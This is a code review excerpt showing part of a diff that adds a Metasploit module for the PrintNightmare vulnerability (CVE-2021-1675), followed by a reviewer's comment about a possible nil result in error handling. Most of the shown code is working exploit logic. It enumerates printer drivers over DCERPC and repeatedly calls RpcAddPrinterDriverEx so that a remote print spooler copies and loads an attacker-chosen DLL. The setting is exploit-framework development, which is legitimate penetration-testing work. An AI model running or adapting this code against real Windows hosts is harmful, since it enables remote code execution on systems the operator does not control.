modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb

```diff
@@ -0,0 +1,430 @@
+      fail_with(Failure::Unreachable, "The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description})")
+    end
+    vprint_status("Bound to #{handle} ...")
+
+    print_status('Enumerating the installed printer drivers...')
+    drivers = enum_printer_drivers(environment)
+    driver_path = "#{drivers.driver_path.rpartition('\\').first}\\UNIDRV.DLL"
+    vprint_status("Using driver path: #{driver_path}")
+
+    config_directory = get_printer_driver_directory(environment)
+    vprint_status("Using directory: #{config_directory}")
+
+    filename = datastore['DLL_PATH'].rpartition('\\').last
+    container = PrintSystem::DriverContainer.new(
+      level: 2,
+      tag: 2,
+      driver_info: PrintSystem::DriverInfo2.new(
+        c_version: 3,
+        p_name_ref_id: 0x00020000,
+        p_environment_ref_id: 0x00020004,
+        p_driver_path_ref_id: 0x00020008,
+        p_data_file_ref_id: 0x0002000c,
+        p_config_file_ref_id: 0x00020010,
+        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913
+        p_name: "#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}",
+        p_environment: environment,
+        p_driver_path: driver_path,
+        p_data_file: datastore['DLL_PATH'],
+        p_config_file: 'C:\\Windows\\System32\\kernel32.dll'
+      )
+    )
+
+    flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES
+    add_printer_driver_ex("\\\\#{datastore['RHOST']}", container, flags)
+
+    1.upto(3) do |directory|
+      container.driver_info.p_config_file.assign("#{config_directory}\\3\\old\\#{directory}\\#{filename}")
+      add_printer_driver_ex("\\\\#{datastore['RHOST']}", container, flags)
+    end
+  end
+
+  def enum_printer_drivers(environment)
+    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)
+    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)
+    DriverInfo2.read(response.p_drivers.referent.value.map(&:chr).join)
+  end
+
+  def get_printer_driver_directory(environment)
+    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)
+    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)
+    RubySMB::Field::Stringz16.read(response.p_driver_directory.referent.value.map(&:chr).join).encode('ASCII-8BIT')
+  end
+
+  def add_printer_driver_ex(name, container, flags)
+    begin
+      response = rprn_call('RpcAddPrinterDriverEx', p_name: name, p_driver_container: container, dw_file_copy_flags: flags)
+    rescue RubySMB::Error::UnexpectedStatusCode => e
+      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first
```

Comment:
Assuming that no ret value could be found using `find_by_retval`, the result of calling this line will be be that `nt_status` is set to `nil` as `.first` will be called on an empty array, and this should be accounted for to avoid a crash on the following line.